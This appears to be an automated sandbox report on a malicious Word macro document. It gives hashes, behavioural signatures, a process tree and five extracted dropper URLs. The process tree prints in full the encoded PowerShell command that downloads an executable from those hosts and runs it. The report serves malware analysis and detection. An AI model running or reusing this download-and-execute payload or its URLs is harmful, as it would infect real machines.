Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    27/05/2024, 19:07

General

  • Target

    7a327006a49fa731461955d500e312dc_JaffaCakes118.doc

  • Size

    244KB

  • MD5

    7a327006a49fa731461955d500e312dc

  • SHA1

    331daffed89c0391683f12c91bdd35d4a4a45106

  • SHA256

    788d5bb87879fca4fec80a7ab909d74baf2cb634036860e37ebdaa7f44b49674

  • SHA512

    8779b99fa388dd9ddb8c975cac29a7fe8a10829ea0a92c5ec5142f5e8216c53393970a6594d20cec570b46ecf6a9eab980d06b82bbb920508b7f494a52d31f22

  • SSDEEP

    3072:iKmtgp237irS5/01rO9rN4iG/8jL/xSu90OoiLuDKZXfwKeljR1A:iKSo237ir4/2O9rN4d/KxUOmD+XfwL0

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://iventurecard.co.uk/mqGwkGN

exe.dropper

http://yduocvinhphuc.info/kblPYSdiX

exe.dropper

http://zinimedia.dk/wCJyaYfn2

exe.dropper

http://nightonline.ru/images/WF0wknLoVI

exe.dropper

http://www.acs.vn/0SCQbnzLv

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7a327006a49fa731461955d500e312dc_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2108
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PoWersheLL.exe
      PoWersheLL -e JABNAFYAZABRAHMAbQA1AD0AKAAnAG4AJwArACcAZgBSAGwAbABmADgAJwArACcARAAnACkAOwAkAEwAawBBAFEAbAAxAGwAMAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABDAEQAdgBFAGsAdwBNAD0AKAAnAGgAJwArACcAdAB0AHAAJwArACcAOgAvAC8AaQB2AGUAbgB0ACcAKwAnAHUAcgBlAGMAJwArACcAYQByAGQAJwArACcALgBjACcAKwAnAG8AJwArACcALgB1AGsAJwArACcALwAnACsAJwBtAHEARwAnACsAJwB3ACcAKwAnAGsARwBOAEAAaAB0AHQAcAA6AC8ALwB5AGQAdQBvAGMAJwArACcAdgBpAG4AaABwAGgAdQBjACcAKwAnAC4AaQBuACcAKwAnAGYAJwArACcAbwAvAGsAYgBsAFAAJwArACcAWQBTAGQAaQBYACcAKwAnAEAAJwArACcAaAAnACsAJwB0ACcAKwAnAHQAJwArACcAcAA6AC8ALwAnACsAJwB6AGkAJwArACcAbgAnACsAJwBpACcAKwAnAG0AZQBkAGkAYQAuACcAKwAnAGQAJwArACcAawAnACsAJwAvAHcAQwBKAHkAYQAnACsAJwBZACcAKwAnAGYAbgAyAEAAaAAnACsAJwB0AHQAJwArACcAcAA6ACcAKwAnAC8AJwArACcALwBuAGkAZwBoAHQAbwBuACcAKwAnAGwAJwArACcAaQBuACcAKwAnAGUALgByAHUALwBpAG0AYQBnAGUAcwAnACsAJwAvAFcAJwArACcARgAwAHcAawBuAEwAJwArACcAbwBWAEkAJwArACcAQAAnACsAJwBoAHQAdABwADoALwAvAHcAdwB3ACcAKwAnAC4AYQBjAHMALgAnACsAJwB2AG4ALwAwACcAKwAnAFMAQwBRACcAKwAnAGIAbgB6ACcAKwAnAEwAdgAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABrAGoATwB2ADAAdgBuAG8APQAoACcAUgBUACcAKwAnAFQAcQB3ACcAKwAnAFoAdQBZACcAKQA7ACQAYwBiAFcANQB3AFoAIAA9ACAAKAAnADIAOQAnACsAJwA5ACcAKQA7ACQAQwByAHoATwBrAGoAagA3AD0AKAAnAHMARwAnACsAJwBpADUAQwBBAGsAJwApADsAJABkAFEAWAA4AGQAdwBBAEYAPQAkAGUAbgB2ADoAdABlAG0AcAArACcAXAAnACsAJABjAGIAVwA1AHcAWgArACgAJwAuAGUAeAAnACsAJwBlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAE0ASAB0AFMAWQBvACAAaQBuACAAJABDAEQAdgBFAGsAdwBNACkAewB0AHIAeQB7ACQATABrAEEAUQBsADEAbAAwAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAE0ASAB0AFMAWQBvACwAIAAkAGQAUQBYADgAZAB3AEEARgApADsAJABEADgAQwA1AG8AYwBMAD0AKAAnAEsAdQAnACsAJwBqAHUAJwArACcASgBGAHAAMwAnACkAOwBJAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABkAFEAWAA4AGQAdwBBAEYAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABkAFEAWAA4AGQAdwBBAEYAOwAkAFUAUABIAHMANgBkAGQAPQAoACcAbwB0AFoASwA0ACcAKwAnAHoAaQB3ACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABKAHcAWQA2AHIAdQBNAHoAPQAoACcAWQBPACcAKwAnAEsAbABEAEcAUAAnACsAJwA4ACcAKQA7AA==
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:300
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2912

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

            Filesize

            68KB

            MD5

            29f65ba8e88c063813cc50a4ea544e93

            SHA1

            05a7040d5c127e68c25d81cc51271ffb8bef3568

            SHA256

            1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

            SHA512

            e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

          • C:\Users\Admin\AppData\Local\Temp\Tar69F1.tmp

            Filesize

            177KB

            MD5

            435a9ac180383f9fa094131b173a2f7b

            SHA1

            76944ea657a9db94f9a4bef38f88c46ed4166983

            SHA256

            67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

            SHA512

            1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            20KB

            MD5

            3be6b516571848167f37dc3491203817

            SHA1

            0329c853ca6e763776911bf5967894cf9ed6c57d

            SHA256

            58cc830812e64c73e475b482d2662d4150986dc3764a0870b19ace4cb6f6e33f

            SHA512

            5e0a711b172249026ab8825d4bd67d20cd6443945054fb859e4d6bb15411dabaf059f61f2ca0d84feac98f4fc0e5315a81832f07acd9817ec9b473e05184ff21

          • memory/2108-84-0x00000000051B0000-0x00000000052B0000-memory.dmp

            Filesize

            1024KB

          • memory/2108-134-0x00000000711DD000-0x00000000711E8000-memory.dmp

            Filesize

            44KB

          • memory/2108-83-0x00000000051B0000-0x00000000052B0000-memory.dmp

            Filesize

            1024KB

          • memory/2108-61-0x00000000051B0000-0x00000000052B0000-memory.dmp

            Filesize

            1024KB

          • memory/2108-82-0x00000000051B0000-0x00000000052B0000-memory.dmp

            Filesize

            1024KB

          • memory/2108-0-0x000000002F6D1000-0x000000002F6D2000-memory.dmp

            Filesize

            4KB

          • memory/2108-125-0x00000000051B0000-0x00000000052B0000-memory.dmp

            Filesize

            1024KB

          • memory/2108-41-0x00000000051B0000-0x00000000052B0000-memory.dmp

            Filesize

            1024KB

          • memory/2108-135-0x00000000051B0000-0x00000000052B0000-memory.dmp

            Filesize

            1024KB

          • memory/2108-137-0x0000000006870000-0x0000000006970000-memory.dmp

            Filesize

            1024KB

          • memory/2108-138-0x00000000051B0000-0x00000000052B0000-memory.dmp

            Filesize

            1024KB

          • memory/2108-19-0x00000000051B0000-0x00000000052B0000-memory.dmp

            Filesize

            1024KB

          • memory/2108-2-0x00000000711DD000-0x00000000711E8000-memory.dmp

            Filesize

            44KB

          • memory/2108-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2108-204-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2108-205-0x00000000711DD000-0x00000000711E8000-memory.dmp

            Filesize

            44KB